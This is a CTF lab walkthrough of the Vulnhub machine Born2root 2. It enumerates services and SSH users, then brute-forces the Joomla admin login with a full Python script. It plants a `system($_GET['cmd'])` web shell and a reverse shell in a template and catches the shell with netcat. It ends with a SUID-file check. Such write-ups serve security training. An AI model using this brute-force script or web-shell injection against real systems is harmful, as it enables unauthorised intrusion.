Born2root 2 - Vulnhub - Level: Medium - Report

Medium

Tools used

arp-scan
nmap
nikto
gobuster
dirb
joomscan
cewl
hydra
msfconsole
curl
grep
nc


Reconnaissance

As in the previous report we start with an ARP scan to find the target's IP address on the local network.

┌──(root㉿CCat)-[~]
└─# arp-scan -l
192.168.2.144 08:00:27:21:b0:c2 PCS Systemtechnik GmbH

The target has the IP address `192.168.2.144`; we add it to `/etc/hosts` so we can address it by name.

┌──(root㉿CCat)-[~]
└─# echo "192.168.2.144 born2root2.vln" >> /etc/hosts

Next an Nmap scan over all TCP ports to identify open ports and the services behind them.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000 | grep open
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
44487/tcp open status 1 (RPC #100024)

SSH (22), HTTP (80) and rpcbind (111) are open. Port 44487 is the dynamically assigned port of rpc.statd (RPC program 100024), registered with rpcbind. The same scan without the `grep open` filter gives the details:

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-31 21:05 CET
Nmap scan report for born2root2.vln (192.168.2.144)
Host is up (0.00019s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
| 2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
| 256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_ 256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Welcome to my website
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 44487/tcp status
| 100024 1 52140/tcp6 status
| 100024 1 57205/udp6 status
|_ 100024 1 59467/udp status
44487/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:21:B0:C2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.19 ms born2root2.vln (192.168.2.144)

The unfiltered output adds the SSH host keys, the HTTP title "Welcome to my website" and the rpcbind program table. OpenSSH 6.7p1 and Apache 2.4.10 point to Debian 8 (jessie), which the kernel fingerprint (Linux 3.2 - 4.9) supports.

Web Enumeration

We run Nikto against the web server to pick up obvious misconfigurations and interesting files.

- Nikto v2.5.0
+ Target IP: 192.168.2.144
+ Target Hostname: 192.168.2.144
+ Target Port: 80
+ Start Time: 2024-10-31 21:06:08 (GMT+1)

+ Server: Apache/2.4.10 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 2106, size: 56b7a4ae11380, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /img/: Directory indexing found.
+ /img/: This might be interesting.
+ /manual/: Web server manual found.
+ /manual/images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /package.json: Node.js package file found. It may contain sensitive information.
+ /README.md: Readme Found.
+ 8102 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2024-10-31 21:06:49 (GMT+1) (41 seconds)

+ 1 host(s) tested

Nikto finds directory indexing in `/css/` and `/img/`, Apache's default `/manual/` and `/icons/README`, and a `package.json` at the web root that may reveal what the site is built from. The ETag finding (CVE-2003-1418) only means inode numbers leak through the ETag header; the missing X-Frame-Options and X-Content-Type-Options headers are hardening gaps, not entry points.

We use Gobuster with a long extension list to find further directories and files.

┌──(root㉿CCat)-[~]
└─# gobuster dir -u "http://$IP" -w "/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak,svg,pem,crt,json,conf,ELF,elf,c,java,lib,cgi,csh,config,deb,desc,exp,eps,diff,icon,mod,ln,old,rpm,js.map,pHtml -b '503,404,403' -e --no-error -k
http://192.168.2.144/index.html (Status: 200) [Size: 8454]
http://192.168.2.144/img (Status: 301) [Size: 312] [--> http://192.168.2.144/img/]
http://192.168.2.144/css (Status: 301) [Size: 312] [--> http://192.168.2.144/css/]
http://192.168.2.144/manual (Status: 301) [Size: 315] [--> http://192.168.2.144/manual/]
http://192.168.2.144/js (Status: 301) [Size: 311] [--> http://192.168.2.144/js/]
http://192.168.2.144/javascript (Status: 301) [Size: 319] [--> http://192.168.2.144/javascript/]
http://192.168.2.144/vendor (Status: 301) [Size: 315] [--> http://192.168.2.144/vendor/]
http://192.168.2.144/package.json (Status: 200) [Size: 1226]
http://192.168.2.144/LICENSE (Status: 200) [Size: 1093]
http://192.168.2.144/joomla (Status: 301) [Size: 315] [--> http://192.168.2.144/joomla/]

Gobuster confirms `index.html`, `img`, `css`, `manual`, `js`, `javascript`, `vendor`, `package.json`, `LICENSE` and, new, a `/joomla` directory. The Joomla directory is the most promising target: a CMS with an authenticated backend and a large attack surface, where the exact version decides which known issues apply.

We look at `package.json`, which typically reveals the theme, its version and its dependencies.

http://192.168.2.144/package.json
{
  "title": "New Age",
  "name": "startbootstrap-new-age",
  "version": "4.1.1",
  "description": "A one page app landing page HTML theme for Bootstrap.",
  "keywords": ["css", "sass", "html", "responsive", "theme", "template"],
  "homepage": "https://startbootstrap.com/template-overviews/new-age",
  "bugs": {
    "url": "https://github.com/BlackrockDigital/startbootstrap-new-age/issues",
    "email": "feedback@startbootstrap.com"
  },
  "license": "MIT",
  "author": "Start Bootstrap",
  "contributors": ["David Miller (http://davidmiller.io/)"],
  "repository": {
    "type": "git",
    "url": "https://github.com/BlackrockDigital/startbootstrap-new-age.git"
  },
  "dependencies": {
    "bootstrap": "4.1.1",
    "font-awesome": "4.7.0",
    "jquery": "3.3.1",
    "jquery.easing": "^1.4.1",
    "simple-line-icons": "2.4.1"
  },
  "devDependencies": {
    "browser-sync": "2.24.3",
    "gulp": "^3.9.1",
    "gulp-clean-css": "3.9.4",
    "gulp-header": "2.0.5",
    "gulp-rename": "^1.2.2",
    "gulp-sass": "4.0.1",
    "gulp-uglify": "3.0.0"
  }
}

Template source: https://github.com/StartBootstrap/startbootstrap-new-age/tree/master/dist

`package.json` shows that the front page is the "New Age" landing-page theme from Start Bootstrap (v4.1.1) with purely client-side dependencies (Bootstrap 4.1.1, jQuery 3.3.1, Font Awesome 4.7.0) and gulp build tooling. Nothing in it runs server-side, so this is a fingerprint of a static page rather than an exploitable component; the application worth attacking is Joomla.

In parallel we enumerate SSH user names. OpenSSH 6.7p1 predates the fix for the user-enumeration weakness (CVE-2018-15473) that the "malformed packet" technique of the Metasploit module relies on, so this is worth a try.

┌──(root㉿CCat)-[~]
└─# msfconsole -q -x "search ssh_enum"
Matching Modules

# Name Disclosure Date Rank Check Description
- - - -- --
0 auxiliary/scanner/ssh/ssh_enumusers . normal No SSH Username Enumeration
1 \_ action: Malformed Packet . . . Use a malformed packet
2 \_ action: Timing Attack . . . Use a timing attack
3 auxiliary/scanner/ssh/ssh_enum_git_keys . normal No Test SSH Github Access

We use `auxiliary/scanner/ssh/ssh_enumusers` with a large user-name list. The malformed-packet action is the default; `THRESHOLD` only matters for the timing-attack action.

msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
USER_FILE => /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set THRESHOLD 10
THRESHOLD => 10
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set THREADS 10
THREADS => 10
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set rport 22
rport => 22
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 192.168.2.144
rhosts => 192.168.2.144
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run
[*] 192.168.2.144:22 - SSH - Using malformed packet technique
[*] 192.168.2.144:22 - SSH - Checking for false positives
[*] 192.168.2.144:22 - SSH - Starting scan
[+] 192.168.2.144:22 - SSH - User 'mail' found
[+] 192.168.2.144:22 - SSH - User 'root' found
[+] 192.168.2.144:22 - SSH - User 'news' found
[+] 192.168.2.144:22 - SSH - User 'tim' found
[+] 192.168.2.144:22 - SSH - User 'man' found
[+] 192.168.2.144:22 - SSH - User 'bin' found
[+] 192.168.2.144:22 - SSH - User 'games' found
[+] 192.168.2.144:22 - SSH - User 'nobody' found
[+] 192.168.2.144:22 - SSH - User 'backup' found
[+] 192.168.2.144:22 - SSH - User 'daemon' found
[+] 192.168.2.144:22 - SSH - User 'proxy' found

Besides the standard system accounts (root, mail, news, bin, daemon, ...) the module reports `tim`, the only personal account. Because the module first checks for false positives (a random, non-existent user must not be reported), this is a usable candidate both for SSH and for the Joomla login.

Initial Access

We run joomscan to check the Joomla installation for known vulnerabilities, first against the web root:

┌──(root㉿CCat)-[~]
└─# joomscan -u 192.168.2.144
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)

--=[WASP JoomScan
+++[Version : 0.0.7
+++[Update Date : [2018/09/23]
+++[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@WASP_JoomScan , @rezesp , @Ali_Razmjo0 , @WASP

Processing http://192.168.2.144 ...


[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] ver 404

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.2.144/joomla/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found


Your Report : reports/192.168.2.144/

joomscan reports `ver 404`: the version files it requests (manifests, language files, README) return 404 at the web root because Joomla lives under `/joomla/`, so "core not vulnerable" means nothing here. The admin finder still locates `http://192.168.2.144/joomla/administrator/`. We need the Joomla version, so we will rerun the scan with the correct base path.

For context, the version distribution reported by the Joomla project's statistics endpoint (Joomla 3.x still dominates):

┌──(root㉿CCat)-[~]
└─# curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.89,
"3.2": 0.01,
"3.3": 0.01,
"3.4": 0.04,
"3.5": 11.4,
"3.6": 21.28,
"3.7": 7.44,
"3.8": 16.47,
"3.9": 25.09,
"4.0": 3.07,
"4.1": 1.32,
"4.2": 2.03,
"4.3": 1.41,
"4.4": 1.45,
"5.0": 0.89,
"5.1": 1,
"5.2": 0.19
},
"total": 3171254
}

A recursive dirb run confirms a standard Joomla 3 directory layout under `/joomla/` (administrator, components, libraries, templates, ...):

┌──(root㉿CCat)-[~]
└─# dirb http://192.168.2.144
- Entering directory: http://192.168.2.144/joomla/ -
> DIRECTORY: http://192.168.2.144/joomla/administrator/
> DIRECTORY: http://192.168.2.144/joomla/bin/
> DIRECTORY: http://192.168.2.144/joomla/cache/
> DIRECTORY: http://192.168.2.144/joomla/components/
> DIRECTORY: http://192.168.2.144/joomla/images/
> DIRECTORY: http://192.168.2.144/joomla/includes/
+ http://192.168.2.144/joomla/index.php (CODE:200|SIZE:8501)
> DIRECTORY: http://192.168.2.144/joomla/language/
> DIRECTORY: http://192.168.2.144/joomla/layouts/
> DIRECTORY: http://192.168.2.144/joomla/libraries/
> DIRECTORY: http://192.168.2.144/joomla/media/
> DIRECTORY: http://192.168.2.144/joomla/modules/
> DIRECTORY: http://192.168.2.144/joomla/plugins/
> DIRECTORY: http://192.168.2.144/joomla/templates/
> DIRECTORY: http://192.168.2.144/joomla/tmp/

- Entering directory: http://192.168.2.144/javascript/jquery/ -
+ http://192.168.2.144/javascript/jquery/jquery (CODE:200|SIZE:252879)
+ http://192.168.2.144/javascript/jquery/version (CODE:200|SIZE:5)

- Entering directory: http://192.168.2.144/joomla/administrator/ -
> DIRECTORY: http://192.168.2.144/joomla/administrator/cache/
> DIRECTORY: http://192.168.2.144/joomla/administrator/components/
> DIRECTORY: http://192.168.2.144/joomla/administrator/help/
> DIRECTORY: http://192.168.2.144/joomla/administrator/includes/
+ http://192.168.2.144/joomla/administrator/index.php (CODE:200|SIZE:5326)
> DIRECTORY: http://192.168.2.144/joomla/administrator/language/
> DIRECTORY: http://192.168.2.144/joomla/administrator/logs/
> DIRECTORY: http://192.168.2.144/joomla/administrator/modules/
> DIRECTORY: http://192.168.2.144/joomla/administrator/templates/

- Entering directory: http://192.168.2.144/joomla/bin/ -
+ http://192.168.2.144/joomla/bin/index.html (CODE:200|SIZE:31)

- Entering directory: http://192.168.2.144/joomla/cache/ -
+ http://192.168.2.144/joomla/cache/index.html (CODE:200|SIZE:31)

- Entering directory: http://192.168.2.144/joomla/components/ -
+ http://192.168.2.144/joomla/components/index.html (CODE:200|SIZE:31)

- Entering directory: http://192.168.2.144/joomla/images/ -
> DIRECTORY: http://192.168.2.144/joomla/images/banners/
> DIRECTORY: http://192.168.2.144/joomla/images/headers/
+ http://192.168.2.144/joomla/images/index.html (CODE:200|SIZE:31)

- Entering directory: http://192.168.2.144/joomla/includes/ -
+ http://192.168.2.144/joomla/includes/index.html (CODE:200|SIZE:31)

- Entering directory: http://192.168.2.144/joomla/language/ -
+ http://192.168.2.144/joomla/language/index.html (CODE:200|SIZE:31)

- Entering directory: http://192.168.2.144/joomla/layouts/ -
+ http://192.168.2.144/joomla/layouts/index.html (CODE:200|SIZE:31)
> DIRECTORY: http://192.168.2.144/joomla/layouts/joomla/
> DIRECTORY: http://192.168.2.144/joomla/layouts/libraries/
> DIRECTORY: http://192.168.2.144/joomla/layouts/plugins/

- Entering directory: http://192.168.2.144/joomla/libraries/ -
> DIRECTORY: http://192.168.2.144/joomla/libraries/cms/
+ http://192.168.2.144/joomla/libraries/index.html (CODE:200|SIZE:31)
> DIRECTORY: http://192.168.2.144/joomla/libraries/joomla/
> DIRECTORY: http://192.168.2.144/joomla/libraries/legacy/
> DIRECTORY: http://192.168.2.144/joomla/libraries/vendor/
> DIRECTORY: http://192.168.2.144/joomla/plugins/user/

- Entering directory: http://192.168.2.144/joomla/templates/ -
+ http://192.168.2.144/joomla/templates/index.html (CODE:200|SIZE:31)
> DIRECTORY: http://192.168.2.144/joomla/templates/system/

- Entering directory: http://192.168.2.144/joomla/tmp/ -
+ http://192.168.2.144/joomla/tmp/index.html (CODE:200|SIZE:31)

- Entering directory: http://192.168.2.144/joomla/templates/system/ -
> DIRECTORY: http://192.168.2.144/joomla/templates/system/css/
> DIRECTORY: http://192.168.2.144/joomla/templates/system/html/
> DIRECTORY: http://192.168.2.144/joomla/templates/system/images/
+ http://192.168.2.144/joomla/templates/system/index.php (CODE:200|SIZE:0)

Grepping the index page for the generator meta tag does not help:

┌──(root㉿CCat)-[~]
└─# curl http://192.168.2.144/joomla -s | grep -i Joomla | grep generator

The command prints nothing because `/joomla` (no trailing slash) answers with a 301 redirect to `/joomla/` and curl does not follow it without `-L`. Even with `-L` it would not help much: Joomla 3 sets the generator tag to "Joomla! - Open Source Content Management" without a version number.

(Two URLs noted here, `/api/v1/users?public=true` and `/api/index.php/v1/config/application?public=true`, are the Joomla 4 REST API information-disclosure endpoints (CVE-2023-23752). They do not apply to a Joomla 3 target.)
For the login we use the joomla-brute.py script. Its own usage example (placeholder host `joomla-site.local`, result `admin:admin`) is shown here for reference; it is not a result against our target:

┌──(root㉿CCat)-[~]
└─# python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
admin:admin

For a target-specific wordlist we let cewl spider the Joomla site (Tim's blog) and first try the user `tim`, which fails:

┌──(pawn)─(root㉿CCat)-[~/Hackingtools/joomla-bruteforce]
└─# cewl http://192.168.2.144/joomla > ~/cewl.txt
┌──(pawn)─(root㉿CCat)-[~/Hackingtools/joomla-bruteforce]
└─# python3 joomla-brute.py -u http://192.168.2.144/joomla -w ~/cewl.txt -usr tim
(no valid password found)

We run joomscan again, this time with `/joomla` as the base path:

┌──(pawn)─(root㉿CCat)-[~/Hackingtools/joomla-bruteforce]
└─# joomscan -u 192.168.2.144/joomla
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)

--=[WASP JoomScan
+++[Version : 0.0.7
+++[Update Date : [2018/09/23]
+++[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@WASP_JoomScan , @rezesp , @Ali_Razmjo0 , @WASP

Processing http://192.168.2.144/joomla ...


[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.6.0

[+] Core Joomla Vulnerability
[++] Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation
CVE : CVE-2016-8870 , CVE-2016-8869
EDB : https://www.exploit-db.com/exploits/40637/

Joomla! Core Remote Privilege Escalation Vulnerability
CVE : CVE-2016-9838
EDB : https://www.exploit-db.com/exploits/41157/

Joomla! Core Security Bypass Vulnerability
CVE : CVE-2016-9081
https://developer.joomla.org/security-centre/661-20161003-core-account-modifications.html

Joomla! Core Arbitrary File Upload Vulnerability
CVE : CVE-2016-9836
https://developer.joomla.org/security-centre/665-20161202-core-shell-upload.html

Joomla! Information Disclosure Vulnerability
CVE : CVE-2016-9837
https://developer.joomla.org/security-centre/666-20161203-core-information-disclosure.html

PHPMailer Remote Code Execution Vulnerability
CVE : CVE-2016-10033
https://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injection
https://github.com/opsxcq/exploit-CVE-2016-10033
EDB : https://www.exploit-db.com/exploits/40969/

PPHPMailer Incomplete Fix Remote Code Execution Vulnerability
CVE : CVE-2016-10045
https://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injection
EDB : https://www.exploit-db.com/exploits/40969/

[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.2.144/joomla/administrator/components
http://192.168.2.144/joomla/administrator/modules
http://192.168.2.144/joomla/administrator/templates
http://192.168.2.144/joomla/images/banners


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.2.144/joomla/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found


Your Report : reports/192.168.2.144/

With the correct base path joomscan identifies Joomla 3.6.0 and lists the public issues for that release (CVE-2016-8870/8869 unauthenticated account creation, CVE-2016-9838, the PHPMailer RCEs, ...) plus directory listing in several `administrator` subdirectories. The blog content itself is useful as well: it is written by Tim and names his interests, which makes it a good source for a custom wordlist:

http://192.168.2.144/joomla/
Hello there !

you may ask yourself for the utility of this blog right ?

k , so basically most of the time then I am Lazy to write in the main website I write here for my travels fastly without giving too much informations !

h yes the universal question , who am I ?

let's start ... I am Tim I am 32 years old , I come from Brisbane but actually living in USA .

I love to travel and I also love music and football ..

So my passions are travel , football , music .

- Break -

We brute-force the Joomla administrator login with the cewl wordlist again, this time for the built-in account `admin`:

┌──(pawn)─(root㉿CCat)-[~/Hackingtools/joomla-bruteforce]
└─# python3 joomla-brute.py -u http://192.168.2.144/joomla -w ~/cewl.txt -usr admin
admin:travel
http://192.168.2.144/joomla/

With the password `travel` (one of the passions Tim lists on his blog) we log in at `/joomla/administrator/`; the backend greets us with "Hi Super User", so the account has full administrative rights.
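The joomla-brute.py script used above is not shown on this page. As an added example (my own code, not the tool's), here is what a single Joomla 3 administrator login attempt involves: the login form carries an anti-CSRF field whose name is a 32-character hex token with value `1` and a base64 `return` field, both of which must be echoed back in the POST. The field names and the "logout link means logged in" heuristic are assumptions based on Joomla 3's `mod_login`; the sample form is constructed, and the network code only runs from the `__main__` block.

```python
"""Single Joomla 3 administrator login attempt with CSRF token handling."""
import http.cookiejar
import re
import sys
import urllib.parse
import urllib.request

# Joomla 3 admin login form: hidden anti-CSRF field whose *name* is a 32-hex
# token and whose value is "1", plus a base64 "return" field (assumed layout).
TOKEN_RE = re.compile(r'name="([a-f0-9]{32})"\s+value="1"')
RETURN_RE = re.compile(r'name="return"\s+value="([A-Za-z0-9+/=]+)"')


def parse_login_form(html):
    """Return (csrf_token_name, return_value) from the admin login page."""
    t = TOKEN_RE.search(html)
    r = RETURN_RE.search(html)
    if not t:
        raise ValueError("no Joomla CSRF token in login form")
    return t.group(1), (r.group(1) if r else "aW5kZXgucGhw")  # base64("index.php")


def build_login_body(username, password, token, ret):
    """Form body for POST administrator/index.php."""
    return urllib.parse.urlencode({
        "username": username, "passwd": password,
        "option": "com_login", "task": "login", "return": ret, token: "1",
    }).encode()


def login_succeeded(html):
    """Heuristic (assumption): a logged-in backend page contains a logout link
    and no password field; the login form is the other way round."""
    return "task=logout" in html and 'name="passwd"' not in html


def try_login(base_url, username, password, timeout=10):
    """One login attempt against a live target; returns True on success."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    url = urllib.parse.urljoin(base_url, "administrator/index.php")
    with opener.open(url, timeout=timeout) as r:           # GET: session + token
        token, ret = parse_login_form(r.read().decode("utf-8", "replace"))
    body = build_login_body(username, password, token, ret)
    with opener.open(url, body, timeout=timeout) as r:     # POST: credentials
        return login_succeeded(r.read().decode("utf-8", "replace"))


# Constructed sample of the relevant fields of a Joomla 3 admin login page.
SAMPLE_FORM = (
    '<form action="/joomla/administrator/index.php" method="post">'
    '<input name="username" type="text" />'
    '<input name="passwd" type="password" />'
    '<input type="hidden" name="option" value="com_login" />'
    '<input type="hidden" name="task" value="login" />'
    '<input type="hidden" name="return" value="aW5kZXgucGhw" />'
    '<input type="hidden" name="0123456789abcdef0123456789abcdef" value="1" />'
    "</form>"
)

if __name__ == "__main__":
    # usage: python3 joomla_login.py http://192.168.2.144/joomla/ admin ~/cewl.txt
    base, user, wordlist = sys.argv[1:4]
    with open(wordlist) as f:
        for pw in (line.strip() for line in f):
            if pw and try_login(base, user, pw):
                print(f"{user}:{pw}")
                break
```

Each attempt fetches a fresh form, because the token is bound to the session cookie; reusing one token across attempts is the usual reason such scripts report nothing even for the right password.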

From a Super User account, code execution is straightforward: the Template Manager (com_templates) lets us edit the PHP files of any site template in the browser. (The frontend page http://192.168.2.144/joomla/index.php/submit-an-article was also looked at but is not needed.) First attempt: prepend `system($_GET['cmd']);` to the `index.php` of the beez3 template; the `file` parameter is the base64 encoding of `/index.php`:

http://192.168.2.144/joomla/administrator/index.php?option=com_templates&view=template&id=503&file=L2luZGV4LnBocA%3D%3D

Editing file "/index.php" in template "beez3":

system($_GET['cmd']);
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

// No direct access.
defined('_JEXEC') or die;

JLoader::import('joomla.filesystem.file');

// Check modules
$showRightColumn = ($this->coun   [listing truncated in the original]

Message
File successfully saved.

The file is saved, but requests with a `cmd` parameter execute nothing. The reason becomes clear below: beez3 is not the template in use, so its `index.php` is never included.

A PHP reverse shell placed in the same beez3 `index.php` (payload not shown in the original) does not call back either:

┌──(pawn)─(root㉿CCat)-[~/Hackingtools/joomla-bruteforce]
└─# nc -lvnp 9001

Under Templates > Styles the default style is marked with a yellow star; that is the template whose `index.php` the site actually loads, and beez3 is not it:

http://192.168.2.144/joomla/administrator/index.php?option=com_templates&view=styles

Putting the reverse shell into the starred (default) template's `index.php` and requesting the front page gives the callback:

┌──(pawn)─(root㉿CCat)-[~/Hackingtools/joomla-bruteforce]
└─# nc -lvnp 9001
listening on [any] 9001
connect to 192.168.2.199 from (UNKNOWN) 192.168.2.144 46399
Linux born2root 3.16.0-6-586 Debian 3.16.56-1 (2018-04-28) i686 GNU/Linux
 17:19:13 up 1:15, 0 users, load average: 0.00, 0.00, 0.37
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Reverse shell as `www-data` established. The first lines are the uname, uptime, `w` and `id` output the shell prints on connect: Debian with a 3.16 i686 kernel.

Privilege Escalation

With a shell as `www-data` we look for ways to escalate privileges, starting with SUID binaries.

www-data@born2root:/$ find / -type f -perm -4000 -ls 2>/dev/null
138907 12 -rwsr-xr-x 1 root root 9468 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
144166 356 -rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
144700 552 -rwsr-xr-x 1 root root 562536 Nov 19 2017 /usr/lib/openssh/ssh-keysign
155634 176 -rwsrwxrwx 1 root root 176400 Sep 8 2017 /usr/bin/sudo
696 40 -rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su
1698 28 -rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
1697 36 -rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount

`/usr/bin/sudo` stands out: its mode is `-rwsrwxrwx` (4777), i.e. the root-owned SUID binary is group- and world-writable. This does not mean "everyone can run sudo as root": `sudo` is executable by everyone with its normal mode 4755 as well, and what it permits is governed by `/etc/sudoers`. The real problem is the write bits, which let any local user replace the binary. Note, however, that Linux clears the SUID bit when a file is written by a process without CAP_FSETID, so overwriting `/usr/bin/sudo` as `www-data` would leave a non-SUID file rather than give root; it is a hardening failure to report, not an escalation path we use here. `dmcrypt-get-device`, `dbus-daemon-launch-helper`, `ssh-keysign`, `su`, `mount` and `umount` are standard Debian SUID binaries.
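The `find -perm -4000` listing above shows all SUID files but leaves it to the reader to spot the odd mode. As an added example (not part of the original writeup), the following script narrows the listing to the actually suspicious case: SUID or SGID files that are also group- or world-writable, which is what `/usr/bin/sudo` looks like on this box. It runs on any directory; `demo()` builds a constructed tree with a 4777 file, a normal 4755 file and a plain 0755 file instead of touching the real filesystem.

```python
"""Flag set-uid/set-gid files whose mode also grants group or world write."""
import os
import stat
import tempfile


def is_writable_suid(mode):
    """True when the mode has S_ISUID or S_ISGID and group/other write bits."""
    privileged = bool(mode & (stat.S_ISUID | stat.S_ISGID))
    writable = bool(mode & (stat.S_IWGRP | stat.S_IWOTH))
    return privileged and writable


def find_writable_suid(root):
    """Walk root (no symlink following) and return [(path, '0oMODE'), ...]."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:          # unreadable entries are simply skipped
                continue
            if stat.S_ISREG(st.st_mode) and is_writable_suid(st.st_mode):
                hits.append((path, oct(stat.S_IMODE(st.st_mode))))
    return sorted(hits)


def demo():
    """Constructed tree: 'sudo' as 4777 (like on the target), 'su' as a normal
    4755 SUID file, 'ls' as 0755. Returns (tempdir, [(basename, mode), ...])."""
    d = tempfile.mkdtemp(prefix="suid-demo-")
    for name, mode in (("sudo", 0o4777), ("su", 0o4755), ("ls", 0o755)):
        p = os.path.join(d, name)
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(p, mode)          # setting SUID on a file you own is allowed
    hits = [(os.path.basename(p), m) for p, m in find_writable_suid(d)]
    return d, hits


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else None
    results = find_writable_suid(root) if root else demo()[1]
    for path, mode in results:
        print(mode, path)
```

Only the 4777 file is reported; a correctly installed SUID binary (4755) is not a finding by itself, which is the distinction the prose above draws.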

